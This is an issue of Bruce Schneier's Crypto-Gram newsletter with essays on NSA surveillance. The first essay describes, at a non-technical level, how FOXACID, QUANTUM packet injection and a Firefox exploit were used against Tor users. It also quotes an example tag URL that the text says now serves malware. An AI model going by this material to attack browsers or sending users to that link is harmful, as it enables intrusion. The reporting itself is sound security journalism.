Crypto-Gram

October 15, 2013

by Bruce Schneier
BT Security Futurologist
schneier@schneier.com
http://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit <http://www.schneier.com/crypto-gram.html>.

You can read this issue on the web at <http://www.schneier.com/crypto-gram-1310.html>. These same essays and news items appear in the “Schneier on Security” blog at <http://www.schneier.com/>, along with a lively and intelligent comment section. An RSS feed is available.


In this issue:


How the NSA Attacks Tor/Firefox Users With QUANTUM and FOXACID

The online anonymity network Tor is a high-priority target for the National Security Agency. The work of attacking Tor is done by the NSA’s application vulnerabilities branch, which is part of the systems intelligence directorate, or SID. The majority of NSA employees work in SID, which is tasked with collecting data from communications systems around the world.

According to a top-secret NSA presentation provided by the whistleblower Edward Snowden, one successful technique the NSA has developed involves exploiting the Tor browser bundle, a collection of programs designed to make it easy for people to install and use the software. The trick identifies Tor users on the Internet and then executes an attack against their Firefox web browser.

The NSA refers to these capabilities as CNE, or computer network exploitation.

The first step of this process is finding Tor users. To accomplish this, the NSA relies on its vast capability to monitor large parts of the Internet. This is done via the agency’s partnership with US telecoms firms under programs codenamed Stormbrew, Fairview, Oakstar and Blarney.

The NSA creates “fingerprints” that detect HTTP requests from the Tor network to particular servers. These fingerprints are loaded into NSA database systems like XKeyscore, a bespoke collection and analysis tool that NSA boasts allows its analysts to see “almost everything” a target does on the Internet.

Using powerful data analysis tools with codenames such as Turbulence, Turmoil and Tumult, the NSA automatically sifts through the enormous amount of Internet traffic that it sees, looking for Tor connections.

Last month, Brazilian TV news show Fantastico showed screenshots of an NSA tool that had the ability to identify Tor users by monitoring Internet traffic.

The very feature that makes Tor a powerful anonymity service, and the fact that all Tor users look alike on the Internet, makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.

After identifying an individual Tor user on the Internet, the NSA uses its network of secret Internet servers to redirect those users to another set of secret Internet servers, with the codename FOXACID, to infect the user’s computer. FOXACID is an NSA system designed to act as a matchmaker between potential targets and attacks developed by the NSA, giving the agency opportunity to launch prepared attacks against their systems.

Once the computer is successfully attacked, it secretly calls back to a FOXACID server, which then performs additional attacks on the target computer to ensure that it remains compromised long-term, and continues to provide eavesdropping information back to the NSA.

Exploiting the Tor browser bundle

Tor is a well-designed and robust anonymity tool, and successfully attacking it is difficult. The NSA attacks we found individually target Tor users by exploiting vulnerabilities in their Firefox browsers, and not the Tor application directly.

This, too, is difficult. Tor users often turn off vulnerable services like scripts and Flash when using Tor, making it difficult to target those services. Even so, the NSA uses a series of native Firefox vulnerabilities to attack users of the Tor browser bundle.

According to the training presentation provided by Snowden, EGOTISTICALGIRAFFE exploits a type confusion vulnerability in E4X, which is an XML extension for JavaScript. This vulnerability exists in Firefox 11.0—16.0.2, as well as Firefox 10.0 ESR—the Firefox version used until recently in the Tor browser bundle. According to another document, the vulnerability exploited by EGOTISTICALGIRAFFE was inadvertently fixed when Mozilla removed the E4X library with the vulnerability, and when Tor added that Firefox version into the Tor browser bundle, but NSA were confident that they would be able to find a replacement Firefox exploit that worked against version 17.0 ESR.

The Quantum system

To trick targets into visiting a FOXACID server, the NSA relies on its secret partnerships with US telecoms companies. As part of the Turmoil system, the NSA places secret servers, codenamed Quantum, at key places on the Internet backbone. This placement ensures that they can react faster than other websites can. By exploiting that speed difference, these servers can impersonate a visited website to the target before the legitimate website can respond, thereby tricking the target’s browser to visit a FOXACID server.

In the academic literature, these are called “man-in-the-middle” attacks, and have been known to the commercial and academic security communities. More specifically, they are examples of “man-on-the-side” attacks.

They are hard for any organization other than the NSA to reliably execute, because they require the attacker to have a privileged position on the Internet backbone, and exploit a “race condition” between the NSA server and the legitimate website. A top-secret NSA diagram, made public last month, shows a Quantum server impersonating Google in this type of attack.

The NSA uses these fast Quantum servers to execute a packet injection attack, which surreptitiously redirects the target to the FOXACID server. An article in the German magazine Spiegel, based on additional top secret Snowden documents, mentions an NSA developed attack technology with the name of QUANTUMINSERT that performs redirection attacks. Another top-secret Tor presentation provided by Snowden mentions QuantumCookie to force cookies onto target browsers, and another Quantum program to “degrade/deny/disrupt Tor access”.

This same technique is used by the Chinese government to block its citizens from reading censored Internet content, and has been hypothesized as a probable NSA attack technique.

The FOXACID system

According to various top-secret documents provided by Snowden, FOXACID is the NSA codename for what the NSA calls an “exploit orchestrator,” an Internet-enabled system capable of attacking target computers in a variety of different ways. It is a Windows 2003 computer configured with custom software and a series of Perl scripts. These servers are run by the NSA’s tailored access operations, or TAO, group. TAO is another subgroup of the systems intelligence directorate.

The servers are on the public Internet. They have normal-looking domain names, and can be visited by any browser from anywhere; ownership of those domains cannot be traced back to the NSA.

However, if a browser tries to visit a FOXACID server with a special URL, called a FOXACID tag, the server attempts to infect that browser, and then the computer, in an effort to take control of it. The NSA can trick browsers into using that URL using a variety of methods, including the race-condition attack mentioned above and frame injection attacks.

FOXACID tags are designed to look innocuous, so that anyone who sees them would not be suspicious. http://baseball2.2ndhalfplays.com/nested/attribs/… is an example of one such tag, given in another top-secret training presentation provided by Snowden.

There was no registered domain name by that name; it was just an example for internal NSA training purposes.

The training material states that merely trying to visit the homepage of a real FOXACID server will not result in any attack, and that a specialized URL is required. This URL would be created by TAO for a specific NSA operation, and unique to that operation and target. This allows the FOXACID server to know exactly who the target is when his computer contacts it.

According to Snowden, FOXACID is a general CNE system, used for many types of attacks other than the Tor attacks described here. It is designed to be modular, with flexibility that allows TAO to swap and replace exploits if they are discovered, and only run certain exploits against certain types of targets.

The most valuable exploits are saved for the most important targets. Low-value exploits are run against technically sophisticated targets where the chance of detection is high. TAO maintains a library of exploits, each based on a different vulnerability in a system. Different exploits are authorized against different targets, depending on the value of the target, the target’s technical sophistication, the value of the exploit, and other considerations.

In the case of Tor users, FOXACID might use EGOTISTICALGIRAFFE against their Firefox browsers.

According to a top-secret operational management procedures manual provided by Snowden, once a target is successfully exploited it is infected with one of several payloads. Two basic payloads mentioned in the manual are designed to collect configuration and location information from the target computer so an analyst can determine how to further infect the computer.

These decisions are made in part by the technical sophistication of the target and the security software installed on the target computer, called Personal Security Products or PSP, in the manual.

FOXACID payloads are updated regularly by TAO. For example, the manual refers to version 8.2.1.1 of one of them.

FOXACID servers also have sophisticated capabilities to avoid detection and to ensure successful infection of its targets. The operations manual states that a FOXACID payload with the codename DireScallop can circumvent commercial products that prevent malicious software from making changes to a system that survive a reboot process.

The NSA also uses phishing attacks to induce users to click on FOXACID tags.

TAO additionally uses FOXACID to exploit callbacks—which is the general term for a computer infected by some automatic means—calling back to the NSA for more instructions and possibly to upload data from the target computer.

According to a top-secret operational management procedures manual, FOXACID servers configured to receive callbacks are codenamed FrugalShot. After a callback, the FOXACID server may run more exploits to ensure that the target computer remains compromised long term, as well as install “implants” designed to exfiltrate data.

By 2008, the NSA was getting so much FOXACID callback data that they needed to build a special system to manage it all.

This essay previously appeared in the Guardian.
http://www.theguardian.com/world/2013/oct/04/…
It is the technical article associated with this more general-interest article.
http://www.theguardian.com/world/2013/oct/04/…

The URL in the essay (now redacted at the Guardian site) was registered within minutes of the story posting, and is being used to serve malware. Don’t click on it.

The Guardian version of this story got the capitalization wrong. NSA code names should be in all caps. It’s QUANTUMINSERT and FOXACID, even if the news media doesn’t like it. The NSA really should release a style guide for press organizations publishing their secrets.

XKeyscore:
http://www.theguardian.com/world/2013/jul/31/…

Screenshots from the Brazilian news story:
http://www.slate.com/s/future_tense/2013/09/09/…

A man-in-the-middle attack against Google:
https://www.documentcloud.org/documents/…

NSA diagram:
https://www.documentcloud.org/documents/…

Spiegel article:
http://www.spiegel.de/international/europe/…

Speculative essay on how the NSA could use packet injection:
https://medium.com/surveillance-state/1b5ab05ac74e

Source material:
http://www.theguardian.com/world/interactive/2013/…
http://www.theguardian.com/world/interactive/2013/…
http://www.theguardian.com/world/interactive/2013/…

Related Washington Post story:
http://www.washingtonpost.com/world/…
http://apps.washingtonpost.com/g/page/world/…

Director of National Intelligence response:
http://icontherecord.tumblr.com/post/63103784923/…

GCHQ article:
http://www.spiegel.de/international/europe/…


Why It’s Important to Publish the NSA Programs

The Guardian recently reported on how the NSA targets Tor users, along with details of how it uses centrally placed servers on the Internet to attack individual computers. This builds on a Brazilian news story from a mid-September that, in part, shows that the NSA is impersonating Google servers to users; a German story on how the NSA is hacking into smartphones; and a Guardian story from early September on how the NSA is deliberately weakening common security algorithms, protocols, and products.

The common thread among these stories is that the NSA is subverting the Internet and turning it into a massive surveillance tool. The NSA’s actions are making us all less safe, because its eavesdropping mission is degrading its ability to protect the US.

Among IT security professionals, it has been long understood that the public disclosure of vulnerabilities is the only consistent way to improve security. That’s why researchers publish information about vulnerabilities in computer software and operating systems, cryptographic algorithms, and consumer products like implantable medical devices, cars, and CCTV cameras.

It wasn’t always like this. In the early years of computing, it was common for security researchers to quietly alert the product vendors about vulnerabilities, so they could fix them without the “bad guys” learning about them. The problem was that the vendors wouldn’t bother fixing them, or took years before getting around to it. Without public pressure, there was no rush.

This all changed when researchers started publishing. Now vendors are under intense public pressure to patch vulnerabilities as quickly as possible. The majority of security improvements in the hardware and software we all use today is a result of this process. This is why Microsoft’s Patch Tuesday process fixes so many vulnerabilities every month. This is why Apple’s iPhone is designed so securely. This is why so many products push out security updates so often. And this is why mass-market cryptography has continually improved. Without public disclosure, you’d be much less secure against cybercriminals, hacktivists, and state-sponsored cyberattackers.

The NSA’s actions turn that process on its head, which is why the security community is so incensed. The NSA not only develops and purchases vulnerabilities, but deliberately creates them through secret vendor agreements. These actions go against everything we know about improving security on the Internet.

It’s folly to believe that any NSA hacking technique will remain secret for very long. Yes, the NSA has a bigger research effort than any other institution, but there’s a lot of research being done—by other governments in secret, and in academic and hacker communities in the open. These same attacks are being used by other governments. And technology is fundamentally democratizing: today’s NSA secret techniques are tomorrow’s PhD theses and the following day’s cybercrime attack tools.

It’s equal folly to believe that the NSA’s secretly installed backdoors will remain secret. Given how inept the NSA was at protecting its own secrets, it’s extremely unlikely that Edward Snowden was the first sysadmin contractor to walk out the door with a boatload of them. And the previous leakers could have easily been working for a foreign government. But it wouldn’t take a rogue NSA employee; researchers or hackers could discover any of these backdoors on their own.

This isn’t hypothetical. We already know of government-mandated backdoors being used by criminals in Greece, Italy, and elsewhere. We know China is actively engaging in cyber-espionage worldwide. A recent Economist article called it “akin to a government secretly commanding lockmakers to make their products easier to pick—and to do so amid an epidemic of burglary.”

The NSA has two conflicting missions. Its eavesdropping mission has been getting all the headlines, but it also has a mission to protect US military and critical infrastructure communications from foreign attack. Historically, these two missions have not come into conflict. During the cold war, for example, we would defend our systems and attack Soviet systems.

But with the rise of mass-market computing and the Internet, the two missions have become interwoven. It becomes increasingly difficult to attack their systems and defend our systems, because everything is using the same systems: Microsoft Windows, Cisco routers, HTML, TCP/IP, iPhones, Intel chips, and so on. Finding a vulnerability—or creating one—and keeping it secret to attack the bad guys necessarily leaves the good guys more vulnerable.

Far better would be for the NSA to take those vulnerabilities back to the vendors to patch. Yes, it would make it harder to eavesdrop on the bad guys, but it would make everyone on the Internet safer. If we believe in protecting our critical infrastructure from foreign attack, if we believe in protecting Internet users from repressive regimes worldwide, and if we believe in defending businesses and ourselves from cybercrime, then doing otherwise is lunacy.

It is important that we make the NSA’s actions public in sufficient detail for the vulnerabilities to be fixed. It’s the only way to force change and improve security.

This essay previously appeared in the Guardian.
http://www.theguardian.com/commentisfree/2013/oct/…

News stories:
https://www.schneier.com/blog/archives/2013/09/…
http://www.spiegel.de/international/world/…
http://www.theguardian.com/world/2013/sep/05/…

The NSA is subverting the Internet:
http://www.theguardian.com/commentisfree/2013/sep/…
http://www.theguardian.com/commentisfree/2013/sep/…

Government backdoors used by others:
https://www.schneier.com/essay-428.html

Economist article:
http://www.economist.com/news/international/…

The NSA’s two missions:
https://www.schneier.com/blog/archives/2008/05/…


The NSA’s New Risk Analysis

As I recently reported in the Guardian, the NSA has secret servers on the Internet that hack into other computers, codename FOXACID. These servers provide an excellent demonstration of how the NSA approaches risk management, and exposes flaws in how the agency thinks about the secrecy of its own programs.

Here are the FOXACID basics: By the time the NSA tricks a target into visiting one of those servers, it already knows exactly who that target is, who wants him eavesdropped on, and the expected value of the data it hopes to receive. Based on that information, the server can automatically decide what exploit to serve the target, taking into account the risks associated with attacking the target, as well as the benefits of a successful attack. According to a top-secret operational procedures manual provided by Edward Snowden, an exploit named Validator might be the default, but the NSA has a variety of options. The documentation mentions United Rake, Peddle Cheap, Packet Wrench, and Beach Head—all delivered from a FOXACID subsystem called Ferret Cannon. Oh how I love some of these code names. (On the other hand, EGOTISTICALGIRAFFE has to be the dumbest code name ever.)

Snowden explained this to Guardian reporter Glenn Greenwald in Hong Kong. If the target is a high-value one, FOXACID might run a rare zero-day exploit that it developed or purchased. If the target is technically sophisticated, FOXACID might decide that there’s too much chance for discovery, and keeping the zero-day exploit a secret is more important. If the target is a low-value one, FOXACID might run an exploit that’s less valuable. If the target is low-value and technically sophisticated, FOXACID might even run an already-known vulnerability.

We know that the NSA receives advance warning from Microsoft of vulnerabilities that will soon be patched; there’s not much of a loss if an exploit based on that vulnerability is discovered. FOXACID has tiers of exploits it can run, and uses a complicated trade-off system to determine which one to run against any particular target.

This cost-benefit analysis doesn’t end at successful exploitation. According to Snowden, the TAO—that’s Tailored Access Operations—operators running the FOXACID system have a detailed flowchart, with tons of rules about when to stop. If something doesn’t work, stop. If they detect a PSP, a personal security product, stop. If anything goes weird, stop. This is how the NSA avoids detection, and also how it takes mid-level computer operators and turn them into what they call “cyberwarriors.” It’s not that they’re skilled hackers, it’s that the procedures do the work for them.

And they’re super cautious about what they do.

While the NSA excels at performing this cost-benefit analysis at the tactical level, it’s far less competent at doing the same thing at the policy level. The organization seems to be good enough at assessing the risk of discovery—for example, if the target of an intelligence-gathering effort discovers that effort—but to have completely ignored the risks of those efforts becoming front-page news.

It’s not just in the U.S., where newspapers are heavy with reports of the NSA spying on every Verizon customer, spying on domestic e-mail users, and secretly working to cripple commercial cryptography systems, but also around the world, most notably in Brazil, Belgium, and the European Union. All of these operations have caused significant blowback—for the NSA, for the U.S., and for the Internet as a whole.

The NSA spent decades operating in almost complete secrecy, but those days are over. As the corporate world learned years ago, secrets are hard to keep in the information age, and openness is a safer strategy. The tendency to classify everything means that the NSA won’t be able to sort what really needs to remain secret from everything else. The younger generation is more used to radical transparency than secrecy, and is less invested in the national security state. And whistleblowing is the civil disobedience of our time.

At this point, the NSA has to assume that all of its operations will become public, probably sooner than it would like. It has to start taking that into account when weighing the costs and benefits of those operations. And it now has to be just as cautious about new eavesdropping operations as it is about using FOXACID exploits attacks against users.

This essay previously appeared in the Atlantic.
http://www.theatlantic.com/technology/archive/2013/…

NSA purchasing zero-day exploits:
http://www.zdnet.com/…

NSA getting advance warning from Microsoft:
http://www.bloomberg.com/news/2013-06-14/…

TAO:
http://www.foreignpolicy.com/articles/2013/06/10/…

NSA abuses:
http://www.theguardian.com/world/2013/jun/06/…
http://www.theguardian.com/world/2013/jun/06/…
http://www.theguardian.com/world/2013/sep/05/…
http://www.cbsnews.com/8301-202_162-57600928/…
http://www.spiegel.de/international/europe/…
http://www.spiegel.de/international/world/…

Secrets are hard to keep:
http://www.reuters.com/article/2010/11/28/…
http://www.npr.org/templates/story/story.php?…

On openness as a strategy:
http://.ted.com/2013/01/24/…

Overclassification:
http://www.nytimes.com/2013/08/04/sunday-review/…

Generational issues in secrecy:
https://www.schneier.com/essay-449.html

Whistleblowing as civil disobedience:
http://www.zephoria.org/thoughts/archives/2013/07/…


Reforming the NSA

Leaks from the whistleblower Edward Snowden have catapulted the NSA into newspaper headlines and demonstrated that it has become one of the most powerful government agencies in the country. From the secret court rulings that allow it to collect data on all Americans to its systematic subversion of the entire Internet as a surveillance platform, the NSA has amassed an enormous amount of power.

There are two basic schools of thought about how this came to pass. The first focuses on the agency’s power. Like J. Edgar Hoover, NSA Director Keith Alexander has become so powerful as to be above the law. He is able to get away with what he does because neither political party—and nowhere near enough individual lawmakers—dare cross him. Longtime NSA watcher James Bamford recently quoted a CIA official: “We jokingly referred to him as Emperor Alexander—with good cause, because whatever Keith wants, Keith gets.”

Possibly the best evidence for this position is how well Alexander has weathered the Snowden leaks. The NSA’s most intimate secrets are front-page headlines, week after week. Morale at the agency is in shambles. Revelation after revelation has demonstrated that Alexander has exceeded his authority, deceived Congress, and possibly broken the law. Tens of thousands of additional top-secret documents are still waiting to come. Alexander has admitted that he still doesn’t know what Snowden took with him and wouldn’t have known about the leak at all had Snowden not gone public. He has no idea who else might have stolen secrets before Snowden, or who such insiders might have provided them to. Alexander had no contingency plans in place to deal with this sort of security breach, and even now—four months after Snowden fled the country—still has no coherent response to all this.

For an organization that prides itself on secrecy and security, this is what failure looks like. It is a testament to Alexander’s power that he still has a job.

The second school of thought is that it’s the administration’s fault—not just the present one, but the most recent several. According to this theory, the NSA is simply doing its job. If there’s a problem with the NSA’s actions, it’s because the rules it’s operating under are bad. Like the military, the NSA is merely an instrument of national policy. Blaming the NSA for creating a surveillance state is comparable to blaming the US military for the conduct of the Iraq war. Alexander is performing the mission given to him as best he can, under the rules he has been given, with the sort of zeal you’d expect from someone promoted into that position. And the NSA’s power predated his directorship.

Former NSA Director Michael Hayden exemplifies this in a quote from late July: “Give me the box you will allow me to operate in. I’m going to play to the very edges of that box.”

This doesn’t necessarily mean the administration is deliberately giving the NSA too big a box. More likely, it’s simply that the laws aren’t keeping pace with technology. Every year, technology gives us possibilities that our laws simply don’t cover clearly. And whenever there’s a gray area, the NSA interprets whatever law there is to give them the most expansive authority. They simply run rings around the secret court that rules on these things. My guess is that while they have clearly broken the spirit of the law, it’ll be harder to demonstrate that they broke the letter of the law.

In football terms, the first school of thought says the NSA is out of bounds. The second says the field is too big. I believe that both perspectives have some truth to them, and that the real problem comes from their combination.

Regardless of how we got here, the NSA can’t reform itself. Change cannot come from within; it has to come from above. It’s the job of government: of Congress, of the courts, and of the president. These are the people who have the ability to investigate how things became so bad, rein in the rogue agency, and establish new systems of transparency, oversight, and accountability.

Any solution we devise will make the NSA less efficient at its eavesdropping job. That’s a trade-off we should be willing to make, just as we accept reduced police efficiency caused by requiring warrants for searches and warning suspects that they have the right to an attorney before answering police questions. We do this because we realize that a too-powerful police force is itself a danger, and we need to balance our need for public safety with our aversion of a police state.

The same reasoning needs to apply to the NSA. We want it to eavesdrop on our enemies, but it needs to do so in a way that doesn’t trample on the constitutional rights of Americans, or fundamentally jeopardize their privacy or security. This means that sometimes the NSA won’t get to eavesdrop, just as the protections we put in place to restrain police sometimes result in a criminal getting away. This is a trade-off we need to make willingly and openly, because overall we are safer that way.

Once we do this, there needs to be a cultural change within the NSA. Like at the FBI and CIA after past abuses, the NSA needs new leadership committed to changing its culture. And giving up power.

Our society can handle the occasional terrorist act; we’re resilient, and—if we decided to act that way—indomitable. But a government agency that is above the law… it’s hard to see how America and its freedoms can survive that.

This essay previously appeared on TheAtlantic.com, with the unfortunate title of “Zero Sum: Americans Must Sacrifice Some Security to Reform the NSA.” After I complained, they changed the title to “The NSA-Reform Paradox: Stop Domestic Spying, Get More Security.”
http://www.theatlantic.com/politics/archive/2013/09/…

Bamford quote on Alexander:
http://www.wired.com/threatlevel/2013/06/…

NSA morale:
http://articles.latimes.com/2013/aug/24/nation/…

Lack of NSA contingency plans:
http://www.theatlantic.com/national/archive/2013/08/…

Profiles of General Alexander:
http://www.foreignpolicy.com/articles/2013/09/08/…
http://www.wired.com/threatlevel/2013/06/…
http://www.forbes.com/sites/jennifergranick/2013/08/…

Hayden quote:
http://www.charlierose.com/watch/60247615
http://pressthink.org/2013/08/…

Transparency, oversight, and accountability:
http://www.cnn.com/2013/07/31/opinion/…

NSA jeopardizing privacy and security:
https://freedom-to-tinker.com//felten/…
http://online.wsj.com/article/…
http://www.businessweek.com/articles/2013-09-06/…

Indomitable reaction to terrorism:
http://www.theatlantic.com/national/archive/2013/04/…

Is the NSA above the law?
http://www.nytimes.com/2013/06/28/opinion/…


NSA/Snowden News

Tom Tomorrow wrote this cartoon during the battle about the Clipper Chip in 1994. It is remarkably prescient.
https://lh3.ggpht.com/-g8kBDvnw7I8/UiyosmPpJfI/…

Yochai Benkler on the NSA:
http://www.theguardian.com/commentisfree/2013/sep/…

Kit Walsh has an interesting blog post where he looks at how existing law can be used to justify the surveillance of Americans.
http://www.dmlp.org//2013/…

The NSA is looking for a Civil Liberties & Privacy Officer. It appears to be an internal posting.
https://www.nsa.gov/psp/applyonline/EMPLOYEE/HRMS/c/…

Kim Zetter has written the definitive story—at least so far—of the possible backdoor in the Dual_EC_DRBG random number generator that’s part of the NIST SP800-90 standard.
http://www.wired.com/threatlevel/2013/09/…

I’ve said that it seems that the NSA now has a PR firm advising it on response.
https://www.schneier.com/blog/archives/2013/08/…
It’s trying to teach General Alexander how to better respond to questioning.
http://threatpost.com/…

A cute flowchart on how to avoid NSA surveillance:
http://www.dailydot.com/politics/…


The Limitations of Intelligence

We recently learned that US intelligence agencies had at least three days’ warning that Syrian President Bashar al-Assad was preparing to launch a chemical attack on his own people, but wasn’t able to stop it. At least that’s what an intelligence briefing from the White House reveals. With the combined abilities of our national intelligence apparatus—the CIA, NSA, National Reconnaissance Office and all the rest—it’s not surprising that we had advance notice. It’s not known whether the US shared what it knew.

More interestingly, the US government did not choose to act on that knowledge (for example, launch a preemptive strike), which left some wondering why.

There are several possible explanations, all of which point to a fundamental problem with intelligence information and our national intelligence apparatuses.

The first possibility is that we may have had the data, but didn’t fully understand what it meant. This is the proverbial connect-the-dots problem. As we’ve learned again and again, connecting the dots is hard. Our intelligence services collect billions of individual pieces of data every day. After the fact, it’s easy to walk backward through the data and notice all the individual pieces that point to what actually happened. Before the fact, though, it’s much more difficult. The overwhelming majority of those bits of data point in random directions, or nowhere at all. Almost all the dots don’t connect to anything.

Rather than thinking of intelligence as a connect-the-dots picture, think of it as a million unnumbered pictures superimposed on top of each other. Which picture is the relevant one? We have no idea. Turning that data into actual information is an extraordinarily difficult problem, and one that the vast scope of our data-gathering programs makes even more difficult.

The second possible explanation is that while we had some information about al-Assad’s plans, we didn’t have enough confirmation to act on that information. This is probably the most likely explanation. We can’t act on inklings, hunches, or possibilities. We probably can’t even act on probabilities; we have to be sure. But when it comes to intelligence, it’s hard to be sure. There could always be something else going on—something we’re not able to eavesdrop on, spy on, or see from our satellites. Again, our knowledge is most obvious after the fact.

The third is that while we were sure of our information, we couldn’t act because that would reveal “sources and methods.” This is probably the most frustrating explanation. Imagine we are able to eavesdrop on al-Assad’s most private conversations with his generals and aides, and are absolutely sure of his plans. If we act on them, we reveal that we are eavesdropping. As a result, he’s likely to change how he communicates, costing us our ability to eavesdrop. It might sound perverse, but often the fact that we are able to successfully spy on someone is a bigger secret than the information we learn from that spying.

This dynamic was vitally important during World War II. During the war, the British were able to break the German Enigma encryption machine and eavesdrop on German military communications. But while the Allies knew a lot, they would only act on information they learned when there was another plausible way they could have learned it. They even occasionally manufactured plausible explanations. It was just too risky to tip the Germans off that their encryption machines’ code had been broken.

The fourth possibility is that there was nothing useful we could have done. And it is hard to imagine how we could have prevented the use of chemical weapons in Syria. We couldn’t have launched a preemptive strike, and it’s probable that it wouldn’t have been effective. The only feasible action would be to alert the opposition—and that, too, might not have accomplished anything. Or perhaps there wasn’t sufficient agreement for any one course of action—so, by default, nothing was done.

All of these explanations point out the limitations of intelligence. The NSA serves as an example. The agency measures its success by amount of data collected, not by information synthesized or knowledge gained. But it’s knowledge that matters.

The NSA’s belief that more data is always good, and that it’s worth doing anything in order to collect it, is wrong. There are diminishing returns, and the NSA almost certainly passed that point long ago. But the idea of trade-offs does not seem to be part of its thinking.

The NSA missed the Boston Marathon bombers, even though the suspects left a really sloppy Internet trail and the older brother was on the terrorist watch list. With all the NSA is doing eavesdropping on the world, you would think the least it could manage would be keeping track of people on the terrorist watch list. Apparently not.

I don’t know how the CIA measures its success, but it failed to predict the end of the Cold War.

More data does not necessarily mean better information. It’s much easier to look backward than to predict. Information does not necessarily enable the government to act. Even when we know something, protecting the methods of collection can be more valuable than the possibility of taking action based on gathered information. But there’s not a lot of value to intelligence that can’t be used for action. These are the paradoxes of intelligence, and it’s time we started remembering them.

Of course, we need organizations like the CIA, the NSA, the NRO and all the rest. Intelligence is a vital component of national security, and can be invaluable in both wartime and peacetime. But it is just one security tool among many, and there are significant costs and limitations.

We’ve just learned from the recently leaked “black budget” that we’re spending $52 billion annually on national intelligence. We need to take a serious look at what kind of value we’re getting for our money, and whether it’s worth it.

This essay previously appeared on CNN.com.
http://www.cnn.com/2013/09/11/opinion/…

Syrian story and commentary:
http://thecable.foreignpolicy.com/posts/2013/08/30/…
http://www.whitehouse.gov/the-press-office/2013/08/…
http://digbysblog.blogspot.com/2013/08/…

Connecting the dots is hard:
https://www.schneier.com/essay-424.html

Our intelligence budget:
http://articles.washingtonpost.com/2013-08-29/world/…


Metadata Equals Surveillance

Back in June, when the contents of Edward Snowden’s cache of NSA documents were just starting to be revealed and we learned about the NSA collecting phone metadata of every American, many people—including President Obama—discounted the seriousness of the NSA’s actions by saying that it’s just metadata.

Lots and lots of people effectively demolished that trivialization, but the arguments are generally subtle and hard to convey quickly and simply. I have a more compact argument: metadata equals surveillance.

Imagine you hired a detective to eavesdrop on someone. He might plant a bug in their office. He might tap their phone. He might open their mail. The result would be the details of that person’s communications. That’s the “data.”

Now imagine you hired that same detective to surveil that person. The result would be details of what he did: where he went, who he talked to, what he looked at, what he purchased—how he spent his day. That’s all metadata.

When the government collects metadata on people, the government puts them under surveillance. When the government collects metadata on the entire country, they put everyone under surveillance. When Google does it, they do the same thing. Metadata equals surveillance; it’s that simple.

Debunking the “it’s just metadata” myth:
http://www.wired.com/opinion/2013/06/…
http://www.theguardian.com/technology/2013/jun/21/…
https://www.eff.org/deeplinks/2013/06/…
http://www.techdirt.com/articles/20130708/…
https://www.aclu.org//…
http://www.newyorker.com/online/s/newsdesk/2013/…
http://arstechnica.com/tech-policy/2013/08/…
http://kieranhealy.org/blog/archives/2013/06/09/…
http://www.cato.org//…

According to Snowden, the administration is partially basing its bulk collection of metadata on an interpretation of Section 215 of the Patriot Act.
http://i2.cdn.turner.com/cnn/2013/images/08/09/…


Senator Feinstein Admits the NSA Taps the Internet Backbone

We know from the Snowden documents (and other sources) that the NSA taps the Internet backbone through secret agreements with major US telcos, but the US government still hasn’t admitted it.

In late August, the Obama administration declassified a ruling from the Foreign Intelligence Surveillance Court. Footnote 3 reads:

The term ‘upstream collection’ refers to NSA’s interception of Internet communications as they transit [LONG REDACTED CLAUSE], [REDACTED], rather than to acquisitions directly from Internet service providers such as [LIST OF REDACTED THINGS, PRESUMABLY THE PRISM DOWNSTREAM COMPANIES].

Here’s one analysis of the document.

On Thursday, Senator Diane Feinstein filled in some of the details:

Upstream collection…occurs when NSA obtains internet communications, such as e-mails, from certain US companies that operate the Internet background [sic, she means “backbone”], i.e., the companies that own and operate the domestic telecommunications lines over which internet traffic flows.

Note that we knew this in 2006:

One thing the NSA wanted was access to the growing fraction of global telecommunications that passed through junctions on U.S. territory. According to former senator Bob Graham (D-Fla.), who chaired the Intelligence Committee at the time, briefers told him in Cheney’s office in October 2002 that Bush had authorized the agency to tap into those junctions. That decision, Graham said in an interview first reported in The Washington Post on Dec. 18, allowed the NSA to intercept “conversations that . . . went through a transit facility inside the United States.”

And this in 2007:

[The Program] requires the NSA, as noted by Rep. Peter Hoekstra, “to steal light off of different cables” in order to acquire the “information that’s most important to us” Interview with Rep. Peter Hoekstra by Paul Gigot, Lack of Intelligence: Congress Dawdles on Terrorist Wiretapping, JOURNAL EDITORIAL REPORT, FOX NEWS CHANNEL (Aug. 6, 2007) at 2.

So we knew it already, but now we know it even more. So why won’t President Obama admit it?

What we know from 2013:
http://www.theguardian.com/world/2013/jun/08/…
http://www.nytimes.com/2013/08/08/us/…
http://online.wsj.com/article_email/…
http://online.wsj.com/article/…

FISC ruling:
https://www.fas.org/irp/agency/doj/fisa/fisc0912.pdf
http://sealedabstract.com/rants/…

Feinstein quote:
http://www.c-spanvideo.org/clip/4466341

What we knew in 2006:
http://www.washingtonpost.com/wp-dyn/content/…

What we knew in 2007:
https://www.eff.org/sites/default/files/filenode/…

President Obama refuses to admit it:
https://www.cdt.org/pr_statement/…

Another article on this:
https://www.techdirt.com/articles/20130927/…

Mark Klein in 2006:
https://www.eff.org/files/filenode/att/presskit/…


NSA Storing Internet Data, Social Networking Data, on

Pretty Much Everybody

There are two new stories based on the Snowden documents.

This is getting silly. General Alexander just lied about this to Congress last week. The old NSA tactic of hiding behind a shell game of different code names is failing. It used to be they could get away with saying “Project X doesn’t do that,” knowing full well that Projects Y and Z did and that no one would call them on it. Now they’re just looking shiftier and shiftier.

The program the New York Times exposed is basically Total Information Awareness, which Congress defunded in 2003 because it was just too damned creepy. Now it’s back. (Actually, it never really went away. It just changed code names.)

I’m also curious how all those PRISM-era denials from Internet companies about the NSA not having “direct access” to their servers jibes with this paragraph:

The overall volume of metadata collected by the N.S.A. is reflected in the agency’s secret 2013 budget request to Congress. The budget document, disclosed by Mr. Snowden, shows that the agency is pouring money and manpower into creating a metadata repository capable of taking in 20 billion “record events” daily and making them available to N.S.A. analysts within 60 minutes.

Honestly, I think the details matter less and less. We have to assume that the NSA has everyone who uses electronic communications under constant surveillance. New details about hows and whys will continue to emerge—for example, now we know the NSA’s repository contains travel data—but the big picture will remain the same.

The stories:
http://www.nytimes.com/2013/09/29/us/…
http://www.theguardian.com/world/2013/sep/30/…

Alexander lying about this:
https://www.eff.org/deeplinks/2013/09/…

PRISM denials:
http://techcrunch.com/2013/06/06/…
http://www.theguardian.com/world/2013/jun/07/…

We’re under constant surveillance:
